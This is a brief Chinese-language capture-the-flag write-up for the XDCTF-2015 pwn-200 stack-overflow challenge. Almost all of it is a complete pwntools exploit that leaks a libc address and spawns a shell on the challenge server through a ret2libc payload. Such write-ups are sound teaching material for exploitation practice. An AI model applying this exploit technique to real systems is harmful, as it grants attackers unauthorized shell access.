pwn-200
题目来源: XDCTF-2015
栈溢出,无canary,无PIE
dynelf不知道怎么回事查不了system函数,那就泄露地址直接查libc-database
exp如下:
from pwn import * #io = process('./pwn-200') io = remote('111.200.241.244', 59980) #context.log_level = 'debug' main_addr = 0x80484BE write_plt = 0x80483C0 read_plt = 0x8048390 goal_addr = 0x804a100 write_got = 0x804A010 def leak(address): payload = b'a' * 112 + p32(write_plt) + p32(main_addr) payload += p32(1) + p32(address) + p32(4) io.recvuntil('Welcome to XDCTF2015~!\n') io.send(payload) addr = io.recv(4) return addr #d = DynELF(leak, elf = ELF('./pwn-200')) #system_addr = d.lookup('system', 'libc') write_addr = u32(leak(write_got)) info('write_addr: ' + hex(write_addr)) libc_base = write_addr - 0xd43c0 info('libc_base: ' + hex(libc_base)) system_addr = libc_base + 0x3a940 info('system_addr: ' + hex(system_addr)) binsh_addr = libc_base + 0x15902b info('binsh_addr: ' + hex(binsh_addr)) payload = b'a' * 112 + p32(system_addr) + p32(main_addr) + p32(binsh_addr) io.recvuntil('Welcome to XDCTF2015~!\n') io.send(payload) io.interactive()